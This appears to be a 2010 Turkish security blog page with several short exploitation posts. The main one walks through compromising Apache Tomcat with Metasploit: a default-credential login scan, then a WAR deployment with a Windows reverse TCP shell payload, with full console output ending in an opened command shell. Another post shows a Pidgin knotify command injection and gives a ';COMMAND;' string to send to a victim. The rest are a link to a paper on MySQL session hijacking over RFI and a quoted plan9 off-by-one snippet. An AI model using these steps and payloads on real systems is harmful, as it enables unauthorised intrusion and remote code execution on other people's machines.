Tuesday, September 14, 2010

MySQL Session Hijacking over RFI

Yaklaşık 4 ay önce yayınlamıştım. Birkaç değişiklik yaptım, öyle ahım şahım değişiklikler değil blog adresimi düzenledim, kapanış paragrafını değiştirdim vs..

Tekrar yayınlayayım dedim malum eski blogu silince gitmişti. İyi/kötü fikiri olanlara saygı duyarım..

read:
http://sites.google.com/site/canberkbolat/papers/mysql_session_hijacking_over_rfi_v2.pdf

Pwning Tomcat in 2 Step

Kendimi toparladim yazmak için gücümü topladım, çok önemli olmasada 1-2 şey yazayım dedim:) Metasploit ile 2 adımda tomcat'i avlayabilirsiniz. Metasploit, Core Impact, Immunity Canvas gibi ürünler gerçekten "exploitation"a farklı bakış açıları getirdiler. Daha doğrusu kolaylaştırdılar.

Tomcat demişken aslında işin çoğunu yani bizi komut satırına düşüren olayı web uygulamasındaki zafiyetten yararlanarak yapıyoruz. O yüzden hafife almamak gerekir :) Başlıkta belirttiğim gibi 2 adımda iş bitiyor :) Ben hedef olarak sanal makine kullandım, bunu evde deneyin ama gerçek hedeflere karşı denemeyin :)

Adım 1
msf auxiliary(tomcat_administration) > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > set RHOSTS 192.168.10.30
RHOSTS => 192.168.10.30
msf auxiliary(tomcat_mgr_login) > set RPORT 8080
RPORT => 8080
msf auxiliary(tomcat_mgr_login) > exploit
...
[*] 10.29.1.28:8080 - Trying username:'tomcat' with password:'tomcat'
[+] http://192.168.10.30:8080/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] successful login 'tomcat' : 'tomcat'


Evet ilk adımda metasploit'in tomcat_mgr_login isimli auxiliary'si ile taradık default credential'a rastladık. 2.Adıma geçelim

Adım 2
msf auxiliary(tomcat_mgr_login) > use multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.10.30
RHOST => 192.168.10.30
msf exploit(tomcat_mgr_deploy) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(tomcat_mgr_deploy) > set LPORT 31337
LPORT => 31337
msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat
PASSWORD => tomcat
msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat
USERNAME => tomcat
msf exploit(tomcat_mgr_deploy) > exploit

[*] Started reverse handler on 192.168.10.5:31337
[*] Attempting to automatically select a target...
[*] OK - Server info
[*] Tomcat Version: Apache Tomcat/5.5.20
[*] OS Name: Windows 2003
[*] OS Version: 5.2
[*] OS Architecture: x86
[*] JVM Version: 1.5.0_17-b04
[*] JVM Vendor: Sun Microsystems Inc.
[*] Automatically selected target "Windows Universal"
[*] Uploading 52046 bytes as AhWxbQ4DEmgEdFEL0.war ...
[*] Executing /AhWxbQ4DEmgEdFEL0/tACitOVwTthtAu4gWlhkPiB.jsp...
[*] Command shell session 6 opened (192.168.10.5:31337 -> 192.168.10.30:3973) at 2010-08-20 11:16:48 +0300
[*] Undeploying AhWxbQ4DEmgEdFEL0 ...





Gerisi artık size kalmış, hadi bana eyv. :)

Monday, September 13, 2010

Funny Command Injection in Pidgin

Today @_ikki tweet about this funny "fail" bug.Pidgins knotify plugin have remote command injection vulnerability. When you type some commands to your victim its executed with current users local priveliges. Its funny!! :>

--[src/pidgin-knotify.c:71-74]--
command = g_strdup_printf("kdialog --title '%s' --passivepopup '%s' %d", title,
body, timeout);
[...]
result = system(command);
--snip--


Exploitation:
Type your friend who use knotifies old version --> ';COMMAND;'

Reference:
https://bugs.gentoo.org/show_bug.cgi?id=336916

i'm still alive..

hayattayim.. aklima geldikcede birseyler yazicam.. guzel bir parca paylasayim bari :>

Thursday, September 2, 2010

plan9 gethostbyname off-by-one :)

struct servent*
getservbyname(char *name, char *proto)
{
...
static char buf[1024];
...
/* construct the query, always expect an ip# back */
if(num)
snprintf(buf, sizeof buf, "!port=%s %s=*", name, proto);
else
snprintf(buf, sizeof buf, "!%s=%s port=*", proto, name);
...
}

hali hazirda plan9 isletim sistemi olanlar deneyip teyit edebilir ben denemedim sadece Google'da rastladım bir blogdan :)

http://plan9.bell-labs.com/sources/plan9/sys/src/ape/lib/bsd/getservbyname.c

@HellCode Research: "plan9'la ugrasiyordunuz bir goz atarmisiniz :)"